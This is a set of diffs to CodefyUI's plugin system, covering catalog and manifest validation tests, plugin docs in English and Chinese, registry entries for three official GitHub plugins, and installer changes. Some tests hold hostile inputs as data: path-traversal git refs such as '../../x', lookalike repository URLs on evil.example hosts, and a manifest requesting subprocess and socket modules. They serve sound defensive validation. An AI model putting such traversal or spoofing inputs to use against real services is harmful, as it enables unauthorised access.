+    "plugin_id, entry, because",
+    [
+        ("Caps", GOOD_BUILTIN, "not a valid plugin id"),
+        ("trailing-", GOOD_BUILTIN, "not a valid plugin id"),
+        ("pack", "not a table", "entry is not a table"),
+        ("pack", {"kind": "svn", "path": "p"}, "unknown kind"),
+        ("pack", {"kind": "builtin", "name": "P"}, "a builtin entry needs a path"),
+        ("pack", {"kind": "builtin", "path": ""}, "a builtin entry needs a path"),
+        ("pack", {"kind": "github", "name": "P"}, "a github entry needs"),
+        ("pack", {"kind": "github", "repo": "no-slash"}, "a github entry needs"),
+        (
+            "pack",
+            {"kind": "github", "repo": "alice/extras", "path": "plugins/pack"},
+            "cannot also declare a path",
+        ),
+    ],
+)
+def test_a_malformed_entry_is_dropped_with_one_log_line(
+    plugin_id, entry, because, caplog
+):
+    """Dropped rather than raised: one bad row must not empty the Plugin
+    Center, hide the four good packs beside it, or take ``cdui plugin list``
+    down with it. The log line is how the bad row gets fixed."""
+    with caplog.at_level(logging.WARNING, logger=CATALOG_LOGGER):
+        assert validate_catalog(_one(entry, plugin_id)) == {}
+    messages = [record.getMessage() for record in caplog.records]
+    assert any(because in message for message in messages), messages
+    assert any(repr(plugin_id) in message for message in messages), messages
+
+
+def test_one_bad_entry_never_takes_the_good_ones_with_it(caplog):
+    data = {"schema": 1, "plugins": {
+        "good": GOOD_BUILTIN,
+        "alsogood": GOOD_GITHUB,
+        "Bad Id": GOOD_BUILTIN,
+        "broken": {"kind": "builtin"},
+    }}
+    with caplog.at_level(logging.WARNING, logger=CATALOG_LOGGER):
+        entries = validate_catalog(data)
+    assert set(entries) == {"good", "alsogood"}
+    dropped = [r for r in caplog.records if r.name == CATALOG_LOGGER]
+    assert len(dropped) == 2, [r.getMessage() for r in dropped]
+
+
+@pytest.mark.parametrize(
+    "data", [None, [], "registry", 7, {}, {"plugins": None}, {"plugins": ["a"]}]
+)
+def test_a_catalog_that_is_not_a_catalog_is_empty_rather_than_an_exception(
+    data, caplog
+):
+    """Reached with a hand-edited or half-written ``registry.json``. Every
+    caller of this is on the way to showing a list, and a traceback there
+    takes down commands that have nothing to do with the catalog."""
+    with caplog.at_level(logging.WARNING, logger=CATALOG_LOGGER):
+        assert validate_catalog(data) == {}
+    assert caplog.records, "silence would leave nobody to fix the file"
+
+
+# ── manifest accessors ─────────────────────────────────────────────────────
+
+def _shipped_manifest(plugin_id: str) -> dict:
+    return read_manifest(plugin_loader.plugins_builtin_root() / plugin_id)
+
+
+def test_the_edu_pack_declares_the_dependency_its_install_has_to_fetch():
+    """``edu`` is the reason ``python_deps`` exists: ``SentenceEmbedding``
+    needs model2vec, and an install that skipped it would register a node
+    that raises on first run."""
+    assert manifest_python_deps(_shipped_manifest("edu")) == {"model2vec": ">=0.8.0"}
+
+
+def test_a_pack_with_no_dependencies_answers_an_empty_table():
+    assert manifest_python_deps(_shipped_manifest("stats")) == {}
+
+
+def test_the_shipped_packs_ask_for_no_extra_modules_and_no_browser_code():
+    """Both are trust decisions, and the built-in packs make neither: they
+    run on the default allowlist and add nothing to the editor."""
+    for plugin_id in ("edu", "stats"):
+        manifest = _shipped_manifest(plugin_id)
+        assert manifest_allowed_modules(manifest) == []
+        assert manifest_has_frontend(manifest) is False
+
+
+def test_a_manifest_that_asks_for_everything_is_read_back_in_full():
+    manifest = {
+        "plugin": {"id": "greedy", "schema_version": 1},
+        "security": {"allowed_modules": ["subprocess", "socket"]},
+        "python_deps": {"requests": ">=2", "rich": ""},
+        "frontend": {"entry": "dist/index.js"},
+    }
+    assert manifest_allowed_modules(manifest) == ["subprocess", "socket"]
+    assert manifest_python_deps(manifest) == {"requests": ">=2", "rich": ""}
+    assert manifest_has_frontend(manifest) is True
+
+
+@pytest.mark.parametrize(
+    "manifest, expected",
+    [
+        ({}, []),
+        ({"security": "os"}, []),
+        ({"security": {}}, []),
+        # The shape that named this rule: a bare string reaching
+        # ``frozenset("os")`` is ``{"o", "s"}`` -- never a module list.
+        ({"security": {"allowed_modules": "os"}}, []),
+        ({"security": {"allowed_modules": ["os", 7]}}, ["os"]),
+    ],
+)
+def test_allowed_modules_describes_a_manifest_nobody_promised_was_valid(
+    manifest, expected
+):
+    """``validate_manifest`` refuses each of these loudly at install time.
+    The accessor is what an inspect view uses on a manifest already on disk,
+    and there it has to answer rather than raise."""
+    assert manifest_allowed_modules(manifest) == expected
+
+
+@pytest.mark.parametrize(
+    "manifest",
+    [
+        {},
+        {"frontend": "dist/index.js"},
+        {"frontend": {}},
+        {"frontend": {"entry": ""}},
+        {"frontend": {"entry": 1}},
+    ],
+)
+def test_a_frontend_that_is_not_an_entry_path_is_no_frontend(manifest):
+    assert manifest_has_frontend(manifest) is False
+
+
+@pytest.mark.parametrize("manifest", [{}, {"python_deps": None}, {"python_deps": []}])
+def test_python_deps_answers_an_empty_table_for_anything_that_is_not_one(manifest):
+    assert manifest_python_deps(manifest) == {}

--- a/backend/tests/test_plugins_core_sources.py
+++ b/backend/tests/test_plugins_core_sources.py
@@ -45,6 +45,7 @@ from app.core.plugins.manifest import (
     manifest_has_frontend,
     manifest_python_deps,
     read_manifest,
+    validate_manifest,
 )
 from app.core.plugins.sources import ParsedSource, parse_source
 
@@ -319,9 +320,11 @@ def test_a_malformed_entry_is_dropped_with_one_log_line(
     down with it. The log line is how the bad row gets fixed."""
     with caplog.at_level(logging.WARNING, logger=CATALOG_LOGGER):
         assert validate_catalog(_one(entry, plugin_id)) == {}
-    messages = [record.getMessage() for record in caplog.records]
-    assert any(because in message for message in messages), messages
-    assert any(repr(plugin_id) in message for message in messages), messages
+    dropped = [r for r in caplog.records if r.name == CATALOG_LOGGER]
+    assert len(dropped) == 1, [r.getMessage() for r in dropped]
+    message = dropped[0].getMessage()
+    assert because in message, message
+    assert repr(plugin_id) in message, message
 
 
 def test_one_bad_entry_never_takes_the_good_ones_with_it(caplog):
@@ -388,6 +391,44 @@ def test_a_manifest_that_asks_for_everything_is_read_back_in_full():
     assert manifest_allowed_modules(manifest) == ["subprocess", "socket"]
     assert manifest_python_deps(manifest) == {"requests": ">=2", "rich": ""}
     assert manifest_has_frontend(manifest) is True
+
+
+@pytest.mark.parametrize(
+    "manifest, because",
+    [
+        ({}, "[plugin]"),
+        ({"plugin": "greedy"}, "[plugin]"),
+        ({"plugin": {"id": "greedy"}}, "schema_version"),
+        ({"plugin": {"id": "greedy", "schema_version": 2}}, "schema_version"),
+        ({"plugin": {"id": "Greedy", "schema_version": 1}}, "Invalid plugin id"),
+        (
+            {"plugin": {"id": "greedy", "schema_version": 1}, "security": "os"},
+            "[security] must be a table",
+        ),
+        (
+            {
+                "plugin": {"id": "greedy", "schema_version": 1},
+                "security": {"allowed_modules": "os"},
+            },
+            "must be a list of strings",
+        ),
+        (
+            {
+                "plugin": {"id": "greedy", "schema_version": 1},
+                "security": {"capabilities": ["telepathy"]},
+            },
+            "Unknown capability",
+        ),
+    ],
+)
+def test_a_manifest_this_build_will_not_install_is_refused_by_name(manifest, because):
+    """The refusal names the offending key. A manifest is hand-written by
+    somebody who cannot see the installer, so "invalid manifest" costs them a
+    guessing game -- and ``allowed_modules = "os"`` is the shape that proved
+    it, granting ``{"o", "s"}`` and failing much later somewhere else."""
+    with pytest.raises(ManifestError) as excinfo:
+        validate_manifest(manifest)
+    assert because in str(excinfo.value)
 
 
 @pytest.mark.parametrize(

--- a/backend/tests/test_plugins_core_sources.py
+++ b/backend/tests/test_plugins_core_sources.py
@@ -147,6 +147,50 @@ def test_the_github_shapes_all_reach_the_same_owner_and_repo(spec, expected):
 
 
 @pytest.mark.parametrize(
+    "spec, expected_ref",
+    [
+        ("alice/extras@v1.2", "v1.2"),
+        ("https://github.com/alice/extras@v1.2", "v1.2"),
+        ("alice/extras@feat/x", "feat/x"),
+        ("https://github.com/alice/extras@feat/x", "feat/x"),
+        ("alice/extras@0.1.0-rc.1", "0.1.0-rc.1"),
+    ],
+)
+def test_the_two_source_shapes_read_the_same_refs(spec, expected_ref):
+    """One grammar for the ref, whichever door the source came in: the URL
+    form used to end in ``(?:@(.+))?`` and the short form in ``[\\w./-]+``, so
+    the same ref was legal typed one way and unparseable typed the other."""
+    assert parse_source(spec).ref == expected_ref
+
+
+@pytest.mark.parametrize(
+    "spec",
+    [
+        "https://github.com/alice/extras@a b",     # a space: InvalidURL later
+        "https://github.com/alice/extras@v1\tx",   # a control character
+        "alice/extras@../../x",
+        "https://github.com/alice/extras@../../x",
+        "alice/extras@..",
+        "alice/extras@feat/../../x",
+        "alice/extras@feat/..",
+    ],
+)
+def test_a_ref_that_walks_up_or_cannot_be_sent_is_unparseable(spec):
+    """A ref is interpolated into ``/repos/<o>/<r>/commits/<ref>``, so a
+    ``..`` segment asks a different endpoint than the one the user named --
+    and a ref with a space in it never reaches GitHub at all. Both are
+    refused at the string the user typed rather than three modules later."""
+    with pytest.raises(UnparseableSource):
+        parse_source(spec)
+
+
+def test_a_ref_with_two_dots_inside_a_word_is_still_a_ref():
+    """Only ``..`` standing alone between slashes is the traversal; ``v1..2``
+    is a legal tag name and refusing it would be a rule about spelling."""
+    assert parse_source("alice/extras@v1..2").ref == "v1..2"
+
+
+@pytest.mark.parametrize(
     "url, expected",
     [
         ("https://github.com/alice/extras", ("alice", "extras")),

--- a/backend/tests/test_plugins_core_sources.py
+++ b/backend/tests/test_plugins_core_sources.py
@@ -47,7 +47,7 @@ from app.core.plugins.manifest import (
     read_manifest,
     validate_manifest,
 )
-from app.core.plugins.sources import ParsedSource, parse_source
+from app.core.plugins.sources import ParsedSource, parse_github_url, parse_source
 
 CATALOG_LOGGER = "app.core.plugins.catalog"
 
@@ -144,6 +144,30 @@ def test_the_github_shapes_all_reach_the_same_owner_and_repo(spec, expected):
     """One field, four spellings: a person with a plugin in mind should not
     have to know which of them the installer prefers."""
     assert parse_source(spec) == expected
+
+
+@pytest.mark.parametrize(
+    "url, expected",
+    [
+        ("https://github.com/alice/extras", ("alice", "extras")),
+        ("https://github.com/alice/extras.git", ("alice", "extras")),
+        ("https://github.com/alice/extras/", ("alice", "extras")),
+        ("http://www.github.com/alice/extras", ("alice", "extras")),
+        ("https://github.com/alice/extras@v2", ("alice", "extras")),
+        # The host is half of the answer. The path of this one ends in the
+        # owner and repository of a plugin the catalog vouches for.
+        ("https://evil.example.com/CodefyUI/CodefyUI-Plugin-Self-Learning", None),
+        ("https://gitlab.com/alice/extras", None),
+        ("https://github.com.evil.example/alice/extras", None),
+        ("alice/extras", None),   # a short form is not a URL
+        ("", None),
+    ],
+)
+def test_a_recorded_url_names_a_repository_only_when_it_is_on_github(url, expected):
+    """What a lockfile reader needs and what a source parser needs are the
+    same question with the catalog taken out: which repository is this, and
+    is it one at all."""
+    assert parse_github_url(url) == expected
 
 
 def test_an_unknown_bare_word_names_the_catalog_it_was_not_in():

--- a/backend/tests/test_plugins_core_sources.py
+++ b/backend/tests/test_plugins_core_sources.py
@@ -280,6 +280,27 @@ def test_reserved_ids_are_the_fixed_segments_under_api_plugins():
     assert isinstance(RESERVED_PLUGIN_IDS, frozenset)
 
 
+def test_every_fixed_route_segment_is_a_reserved_id():
+    """Read off the ROUTER, not restated from the literal above.
+
+    The set exists because Starlette matches in registration order: a fixed
+    path declared after ``/{plugin_id}`` is reachable only while no pack may
+    be called that. Restating the six names proves they were typed twice; the
+    proof that matters is that the router has no seventh -- which is what the
+    next route added under this prefix would quietly introduce."""
+    from app.api import routes_plugins
+
+    prefix = routes_plugins.router.prefix + "/"
+    segments = {
+        route.path[len(prefix):].split("/")[0]
+        for route in routes_plugins.router.routes
+        if route.path.startswith(prefix)
+    }
+    fixed = {segment for segment in segments if "{" not in segment}
+    assert fixed, "no fixed path under /api/plugins/ -- the scan is broken"
+    assert fixed <= RESERVED_PLUGIN_IDS, sorted(fixed - RESERVED_PLUGIN_IDS)
+
+
 def test_no_pack_this_build_ships_claims_a_reserved_id():
     """The point of the set: a pack called ``install`` would sit where the
     install route already lives, and the router would decide which wins."""
@@ -311,10 +332,23 @@ def test_a_real_entry_is_carried_across_field_by_field():
     assert entries["edu"].chapters == ("I1", "I2")
 
 
+def test_github_catalog_packs_lists_the_official_plugins_this_build_ships():
+    """The rows that cost a download and a consent decision. Asserted by id
+    against the real registry, because a fourth one appearing here without a
+    test noticing is a pack that installs itself into the Plugin Center's
+    list of things CodefyUI vouches for."""
+    packs = github_catalog_packs()
+    assert [entry.id for entry in packs] == [
+        "graph-copilot", "official-template", "self-learning",
+    ]
+    assert all(entry.kind == "github" and entry.official for entry in packs)
+    assert all(entry.repo and entry.repo.startswith("CodefyUI/") for entry in packs)
+
+
 def test_github_catalog_packs_lists_the_repository_entries_sorted_by_id(monkeypatch):
-    """The shape is in the schema so a Plugin Center never has to invent it,
-    and nothing ships through it today -- which is exactly why it is tested
-    against a catalog that does."""
+    """The sort is by id, whatever order the file writes them in -- shown
+    against an injected catalog so the assertion is about the ordering rather
+    than about what this build happens to ship."""
     monkeypatch.setattr("app.core.plugins.catalog.load_catalog", lambda: {
         "schema": 1,
         "plugins": {
@@ -369,6 +403,10 @@ def test_a_github_entry_keeps_its_repo_ref_and_flags():
         ("trailing-", GOOD_BUILTIN, "not a valid plugin id"),
         ("pack", "not a table", "entry is not a table"),
         ("pack", {"kind": "svn", "path": "p"}, "unknown kind"),
+        # Unhashable: ``[] in a_frozenset`` is a TypeError, so these used to
+        # take down the reader that promises to drop rows rather than raise.
+        ("pack", {"kind": [], "path": "p"}, "unknown kind"),
+        ("pack", {"kind": {}, "path": "p"}, "unknown kind"),
         ("pack", {"kind": "builtin", "name": "P"}, "a builtin entry needs a path"),
         ("pack", {"kind": "builtin", "path": ""}, "a builtin entry needs a path"),
         ("pack", {"kind": "github", "name": "P"}, "a github entry needs"),

--- a/docs/docs/advanced/plugins.md
+++ b/docs/docs/advanced/plugins.md
@@ -200,7 +200,7 @@ cdui plugin install CodefyUI/CodefyUI-Plugin-Official
 cdui plugin install your-username/your-fork
 ```
 
-A pack ships any of: a `nodes/` directory (auto-discovered), a `presets/` directory, an `examples/` directory, and an `assets/` directory (mounted at `/plugins/<id>/assets/<file>`). A `cdui.plugin.toml` manifest declares the id, version, `requires_codefyui`, content directories, lesson metadata, and — only if you need them — the `[security]` declarations described under [Security](#security--three-tiers). Delete that section if your nodes are pure computation; most are.
+A pack ships any of: a `nodes/` directory (auto-discovered), a `presets/` directory, an `examples/` directory, and an `assets/` directory (served at `/plugins/<id>/assets/<file>`). A `cdui.plugin.toml` manifest declares the id, version, `requires_codefyui`, content directories, lesson metadata, and — only if you need them — the `[security]` declarations described under [Security](#security--three-tiers). Delete that section if your nodes are pure computation; most are.
 
 :::warning Breaking change (v0.3)
 The chapter packs `c1`–`c6` were repackaged into three direction packs `foundations` / `deep` / `rl`, and every Edu node's type id gained a dash (`EduKNN` → `Edu-KNN`). Saved graphs referencing the old `cN:EduFoo` types must be updated to `<pack>:Edu-Foo` and the packs reinstalled with `cdui plugin install foundations deep rl`.

--- a/docs/docs/advanced/plugins.md
+++ b/docs/docs/advanced/plugins.md
@@ -31,6 +31,14 @@ cdui plugin uninstall deep                 # remembered: sync will not re-add it
 
 `stats` is the odd one out: not a textbook companion but a working reference for third-party pack authors. It is pure numpy + torch, installs at [Tier 0](#security--three-tiers) with **no `[security]` section at all**, and its [README](https://github.com/CodefyUI/CodefyUI/blob/main/plugins/stats/README.md) is the normative write-up of the two contracts a data pack needs — how a table travels between ports, and how a `chart` output is declared and drawn.
 
+Three more official plugins live in their own repositories. They install by the same name the catalog lists them under, and — unlike the packs above — each one is downloaded from GitHub, so installing it is a decision you are asked to confirm.
+
+| Plugin | What it is | Install |
+|------|------------------|-----------|
+| `graph-copilot` | AI chat assistant that builds and edits node graphs by conversation, runs approved isolated experiments and parameter searches, and keeps portable evidence. Needs an LLM provider (Codex, Ollama, OpenAI or Anthropic). | `cdui plugin install graph-copilot` |
+| `self-learning` | Turns a free-form machine-learning problem into a step-by-step lesson: an LLM builds a working graph and proves it runs, then the plugin screenshots each step and emits a Traditional-Chinese Markdown lesson, a printable page, the graph and a starter exercise. | `cdui plugin install self-learning` |
+| `official-template` | Working starter template for plugin authors: two example nodes, a preset, an example workflow, an asset file, a sample test suite and a React tool panel. Install it to see what a plugin can do, fork it to write your own. | `cdui plugin install official-template` |
+
 Each Edu node decomposes a single lesson concept into a chain of named steps that the [Teaching Inspector](/usage/teaching-inspector) renders one row at a time — `Edu-ColumnStats` shows the population-std formula as `sum → divide → deviations² → variance → sqrt`; `Edu-PolicyGradient` exposes `softmax → gather → log → baseline → loss`; `Edu-Patchify` makes `unfold → permute → flatten` visible. Switch on **Verbose mode** in the Settings popover to capture them.
 
 ## How packs are stored
@@ -190,13 +198,13 @@ cdui plugin new my-plugin --ui     # also a React frontend wired to the SDK
 
 It generates a manifest, an example node, a test (with the `cdui_plugins.<id>` namespace shim so `pytest` works locally), and — with `--ui` — a Vite + React `ui/` whose `src/sdk/` is the typed plugin SDK. The plugin lands in `./my-plugin/`; link it with `cdui plugin dev` (below) and start editing.
 
-For a richer reference, fork the **[Official Plugin Template](https://github.com/CodefyUI/CodefyUI-Plugin-Official)** — a working, MIT-licensed plugin with two example nodes, a sample example graph, a test suite, and a fully-commented manifest. Its README walks through every field and the AST security gate.
+For a richer reference, fork the **[Official Plugin Template](https://github.com/CodefyUI/CodefyUI-Plugin-Official)** — a working, MIT-licensed plugin with two example nodes, a sample example graph, a test suite, and a fully-commented manifest. Its README walks through every field and the AST security gate. The catalog lists it as `official-template`, so you can install it by name.
 
 ```bash
 # Install the template itself to see the pattern live
-cdui plugin install CodefyUI/CodefyUI-Plugin-Official
+cdui plugin install official-template
 
-# After forking
+# After forking — any repository, by owner/repo or by URL
 cdui plugin install your-username/your-fork
 ```
 

--- a/docs/i18n/zh-TW/docusaurus-plugin-content-docs/current/advanced/plugins.md
+++ b/docs/i18n/zh-TW/docusaurus-plugin-content-docs/current/advanced/plugins.md
@@ -191,7 +191,7 @@ cdui plugin install CodefyUI/CodefyUI-Plugin-Official
 cdui plugin install your-username/your-fork
 ```
 
-一個外掛包可隨附下列任意內容：一個 `nodes/` 目錄（自動探索）、一個 `presets/` 目錄、一個 `examples/` 目錄，以及一個 `assets/` 目錄（掛載於 `/plugins/<id>/assets/<file>`）。一份 `cdui.plugin.toml` 資訊清單宣告 id、版本、`requires_codefyui`、內容目錄、課程 metadata，以及——只在你需要時——[安全性](#安全性三個層級)一節描述的 `[security]` 宣告。若你的節點只做純運算，直接刪掉那一段就好；大多數外掛都是如此。
+一個外掛包可隨附下列任意內容：一個 `nodes/` 目錄（自動探索）、一個 `presets/` 目錄、一個 `examples/` 目錄，以及一個 `assets/` 目錄（於 `/plugins/<id>/assets/<file>` 提供）。一份 `cdui.plugin.toml` 資訊清單宣告 id、版本、`requires_codefyui`、內容目錄、課程 metadata，以及——只在你需要時——[安全性](#安全性三個層級)一節描述的 `[security]` 宣告。若你的節點只做純運算，直接刪掉那一段就好；大多數外掛都是如此。
 
 :::warning 破壞性變更（v0.3）
 章節外掛包 `c1`–`c6` 已重新封裝為三個方向外掛包 `foundations` / `deep` / `rl`，而且每個 Edu 節點的型別 id 都加上了一個破折號（`EduKNN` → `Edu-KNN`）。引用舊有 `cN:EduFoo` 型別的已儲存圖必須更新為 `<pack>:Edu-Foo`，並以 `cdui plugin install foundations deep rl` 重新安裝這些外掛包。

--- a/docs/i18n/zh-TW/docusaurus-plugin-content-docs/current/advanced/plugins.md
+++ b/docs/i18n/zh-TW/docusaurus-plugin-content-docs/current/advanced/plugins.md
@@ -29,6 +29,14 @@ cdui plugin uninstall deep                 # 會被記住：sync 不會再把它
 
 `stats` 是這裡的例外：它不是教科書的配套，而是給第三方外掛作者的實作範例。它只用 numpy 與 torch，以[第 0 級](#安全性三個層級)安裝且**整份 manifest 沒有 `[security]` 區段**；它的 [README](https://github.com/CodefyUI/CodefyUI/blob/main/plugins/stats/README.md) 正式記載了資料類外掛需要的兩份契約——表格如何在連接埠之間傳遞，以及 `chart` 輸出如何宣告與繪製。
 
+另外有三個官方外掛放在各自的儲存庫裡。它們一樣可以用目錄中的名稱安裝，但和上面的外掛包不同：它們是從 GitHub 下載的，所以安裝時會請你確認。
+
+| 外掛 | 這是什麼 | 安裝 |
+|------|------------------|-----------|
+| `graph-copilot` | AI 對話助手：以對話建立與修改節點圖，執行你核准的隔離實驗與參數搜尋，並保留可攜的實驗紀錄。需要一個 LLM 供應者（Codex、Ollama、OpenAI 或 Anthropic）。 | `cdui plugin install graph-copilot` |
+| `self-learning` | 把一個自由描述的機器學習問題變成逐步教材：先由 LLM 在畫布上建出可實際執行的圖並驗證它跑得起來，再由外掛擷取每一步的截圖，產出繁體中文 Markdown 教材、可列印頁面、圖檔與一份入門練習。 | `cdui plugin install self-learning` |
+| `official-template` | 給外掛作者的可運作起始模板：兩個範例節點、一個 preset、一張範例流程圖、一個資產檔、一套範例測試，以及一個 React 工具面板。裝起來看外掛能做什麼，Fork 它來寫自己的。 | `cdui plugin install official-template` |
+
 每個 Edu 節點都把單一課程概念分解成一連串具名步驟，由 [Teaching Inspector](/usage/teaching-inspector) 一次渲染一列——`Edu-ColumnStats` 將母體標準差公式呈現為 `sum → divide → deviations² → variance → sqrt`；`Edu-PolicyGradient` 暴露 `softmax → gather → log → baseline → loss`；`Edu-Patchify` 讓 `unfold → permute → flatten` 變得可見。在 Settings popover 中開啟 **Verbose mode** 即可擷取它們。
 
 ## 外掛包如何儲存
@@ -181,13 +189,13 @@ cdui plugin new my-plugin --ui     # 另含一個接好 SDK 的 React 前端
 
 它會產生 manifest、一個範例節點、一個測試（內含 `cdui_plugins.<id>` 命名空間 shim，讓本地 `pytest` 可直接執行），並在加上 `--ui` 時產生一個 Vite + React 的 `ui/`，其 `src/sdk/` 即為型別化的外掛 SDK。外掛會建立在 `./my-plugin/`；用下方的 `cdui plugin dev` 連結後即可開始編輯。
 
-若需更完整的參考，可 Fork **[官方外掛模板](https://github.com/CodefyUI/CodefyUI-Plugin-Official)**——一個可運作、採 MIT 授權的外掛，包含兩個範例節點、一張範例圖、一套測試，以及一份完整註解的資訊清單 (manifest)。它的 README 逐欄解說每個欄位與 AST 安全閘門。
+若需更完整的參考，可 Fork **[官方外掛模板](https://github.com/CodefyUI/CodefyUI-Plugin-Official)**——一個可運作、採 MIT 授權的外掛，包含兩個範例節點、一張範例圖、一套測試，以及一份完整註解的資訊清單 (manifest)。它的 README 逐欄解說每個欄位與 AST 安全閘門。它在目錄中的名稱是 `official-template`，可以直接用名稱安裝。
 
 ```bash
 # Install the template itself to see the pattern live
-cdui plugin install CodefyUI/CodefyUI-Plugin-Official
+cdui plugin install official-template
 
-# After forking
+# After forking — any repository, by owner/repo or by URL
 cdui plugin install your-username/your-fork
 ```
 

--- a/plugins/registry.json
+++ b/plugins/registry.json
@@ -35,6 +35,36 @@
       "kind": "builtin",
       "path": "plugins/rl",
       "chapters": ["C5"]
+    },
+    "graph-copilot": {
+      "name": "Graph Copilot — Agent Workbench",
+      "description": "AI chat assistant that builds and edits node graphs by conversation, runs approved isolated experiments and parameter searches, and keeps portable evidence. Frontend extension; needs an LLM provider (Codex, Ollama, OpenAI or Anthropic).",
+      "kind": "github",
+      "repo": "CodefyUI/CodefyUI-Plugin-Graph-Copilot",
+      "ref": "",
+      "homepage": "https://github.com/CodefyUI/CodefyUI-Plugin-Graph-Copilot",
+      "tags": ["copilot", "llm", "agent"],
+      "official": true
+    },
+    "self-learning": {
+      "name": "Self-Learning — 自學教材產生器",
+      "description": "Turns a free-form machine-learning problem into a step-by-step lesson: an LLM builds a working graph on the canvas and proves it runs, then the plugin derives the teaching steps, screenshots each one, and emits a Traditional-Chinese Markdown lesson, a printable page, the graph and a starter exercise. Frontend extension.",
+      "kind": "github",
+      "repo": "CodefyUI/CodefyUI-Plugin-Self-Learning",
+      "ref": "",
+      "homepage": "https://github.com/CodefyUI/CodefyUI-Plugin-Self-Learning",
+      "tags": ["lesson", "llm", "teaching"],
+      "official": true
+    },
+    "official-template": {
+      "name": "CodefyUI Plugin — Official Template",
+      "description": "Working starter template for plugin authors: two example nodes (HelloPlugin, MovingAverage), a preset, an example workflow, an asset file, a sample test suite and a React tool panel. Install it to see what a plugin can do, fork it to write your own.",
+      "kind": "github",
+      "repo": "CodefyUI/CodefyUI-Plugin-Official",
+      "ref": "",
+      "homepage": "https://github.com/CodefyUI/CodefyUI-Plugin-Official",
+      "tags": ["template", "example"],
+      "official": true
     }
   }
 }

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -734,7 +734,13 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
         tar = Path(tmpd) / "src.tar.gz"
         try:
             download_tarball(owner, repo, sha, tar)
-        except (HTTPError, URLError, OSError, RuntimeError) as e:
+        # What the core client actually raises: GitHubError for anything the
+        # network answered (or did not), PluginInstallError for the size cap,
+        # OSError for the disk it is being written to. Named rather than
+        # caught through their base classes -- the first two are RuntimeError
+        # subclasses only by an inheritance choice made three modules away,
+        # and a failed install that becomes a traceback is not a small bug.
+        except (GitHubError, PluginInstallError, OSError) as e:
             err(f"下載失敗：{e}", f"Download failed: {e}")
             return 1
 

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -1398,15 +1398,17 @@ def cmd_uninstall(args: argparse.Namespace) -> int:
         err(f"找不到外掛 {plugin_id}", f"Plugin '{plugin_id}' is not installed")
         return 1
 
-    if outcome.files_removed is False:
-        # The entry is gone either way, so the plugin stops loading; what is
-        # left is a directory nobody will look at again. Windows holding a
-        # file open is the usual cause, exactly as in `cdui packs remove`.
-        warn(
-            f"檔案未能刪除，請手動移除：{plugins_user_root() / plugin_id}",
-            f"Could not delete the plugin files; remove them by hand: "
-            f"{plugins_user_root() / plugin_id}",
+    if not outcome.removed:
+        # The files are still there, so the plugin would load again on the
+        # next start: nothing was uninstalled, and saying otherwise would be
+        # a lie the lockfile then tells forever. Windows holding a file open
+        # is the usual cause.
+        plugin_dir = plugins_user_root() / plugin_id
+        err(
+            f"刪除失敗：{outcome.error}",
+            f"Failed to remove {plugin_dir}: {outcome.error}",
         )
+        return 1
 
     if _backend_reload():
         ok("熱重載完成", "Hot-reloaded backend")

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -231,6 +231,28 @@ def builtin_catalog_packs() -> dict[str, dict[str, Any]]:
     return core_catalog.builtin_catalog_packs(load_catalog())
 
 
+def catalog_entries() -> dict[str, core_catalog.CatalogEntry]:
+    """Every well-formed catalog row, in the shape the installer dispatches on.
+
+    The raw dict is what most of this module reads, because that is what its
+    tests fake; this is the same document run through
+    :func:`~app.core.plugins.catalog.validate_catalog`, which is what turns
+    ``kind`` into a promise -- a ``github`` row that reached here really does
+    carry an ``owner/repo`` and really does not carry a ``path``.
+    """
+    return core_catalog.validate_catalog(load_catalog())
+
+
+def catalog_entry(plugin_id: str) -> core_catalog.CatalogEntry | None:
+    """One catalog row by id, case-insensitively, or ``None``.
+
+    ``None`` means either "no such id" or "that row is malformed" -- the
+    callers here treat both the same way, because a row the validator dropped
+    is a row this build cannot install either.
+    """
+    return catalog_entries().get(plugin_id.lower())
+
+
 def available_builtin_packs() -> list[tuple[str, str]]:
     """Built-in packs shipped on disk that this install has made no decision about.
 
@@ -601,7 +623,7 @@ def cmd_install(args: argparse.Namespace) -> int:
 
         lockfile = load_lockfile()
         rc = (
-            _install_catalog(a, args, lockfile)
+            _install_by_catalog_name(a, args, lockfile)
             if kind == "catalog"
             else _install_github(a, b, ref, args, lockfile)
         )
@@ -609,6 +631,35 @@ def cmd_install(args: argparse.Namespace) -> int:
             return rc
         overall = rc
     return overall
+
+
+def _install_by_catalog_name(plugin_id: str, args, lockfile) -> int:
+    """Install the pack the catalog calls *plugin_id*, whichever kind it is.
+
+    ``parse_source`` answers "catalog" for any id in ``registry.json``, and
+    the two kinds behind that word are installed by completely different
+    code: a ``builtin`` pack is activated in place from the release's own
+    files, a ``github`` pack is fetched from the repository the catalog
+    names. Deciding here rather than in ``cmd_install`` keeps the two
+    branches side by side, where the difference is the whole point.
+
+    The catalog id is carried into the repository install so the lockfile can
+    record which row the pack came from -- that is what lets a Plugin Center
+    show it as the catalog's pack rather than as free text that happens to
+    have the same id.
+    """
+    entry = catalog_entry(plugin_id)
+    if entry is not None and entry.kind == "github":
+        owner, _, repo = (entry.repo or "").partition("/")
+        return _install_github(
+            owner, repo, entry.ref, args, lockfile, catalog_id=entry.id
+        )
+    # Either a builtin row or one ``validate_catalog`` dropped. The second is
+    # deliberately not a separate refusal: the builtin path already stops on a
+    # pack with no manifest on disk, which is exactly what a malformed row
+    # leaves behind, and a corrupt catalog must not grow its own vocabulary of
+    # errors that only a hand-edited registry.json can reach.
+    return _install_catalog(plugin_id, args, lockfile)
 
 
 def _install_catalog(plugin_id: str, args, lockfile) -> int:
@@ -700,7 +751,68 @@ def _install_catalog(plugin_id: str, args, lockfile) -> int:
     return 0
 
 
-def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
+def _reserved_id_refusal(
+    plugin_id: str, owner: str, repo: str
+) -> tuple[str, str] | None:
+    """The bilingual refusal for an id ``{owner}/{repo}`` may not install
+    under, or ``None`` when it may.
+
+    Three ids are refused, and the third is the one worth spelling out. An id
+    is taken if it names a route under ``/api/plugins/`` (the router, not the
+    plugin, would decide which one answers) or a pack that ships with
+    CodefyUI (the built-in directory would decide). A ``github`` catalog id
+    is different: that row IS a repository, so refusing it outright would
+    make the official pack the catalog advertises the one thing nobody can
+    install. So it is refused only for a DIFFERENT repository -- the id is
+    what the lockfile, the catalog card and the route all key on, and a fork
+    claiming it would quietly take the official pack's place.
+    """
+    entry = catalog_entry(plugin_id)
